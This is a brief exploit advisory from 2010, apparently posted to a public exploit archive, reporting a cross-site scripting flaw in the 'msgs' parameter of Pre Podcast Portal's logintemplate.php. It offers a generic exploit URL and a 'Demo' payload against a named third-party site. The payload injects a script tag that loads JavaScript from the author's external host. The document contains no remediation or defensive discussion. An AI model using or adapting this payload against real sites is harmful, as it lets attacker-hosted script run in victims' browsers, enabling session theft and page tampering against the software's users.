Pre Podcast Portal suffers from a cross site scripting vulnerability.
c94d43729d813b5f0e5b9660cd8fbeda7ce119aaa42c7de484f726425517d3b1
In The Name Of GOD
[+] Exploit Title: PRE PODCAST PORTAL XSS Vulnerability
[+] Date: 2010-11-13
[+] Author : Cru3l.b0y
[+] Software Link: http://www.preproject.com/podcast.asp
[+] Price : 125.00$
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit :
http://target/path/logintemplate.php?msgs=xss
[+] Demo: http://www.hostnomi.net/newpod/logintemplate.php?msgs=<script src='http://cru3lb0y.persiangig.com/XSS.JS'></script>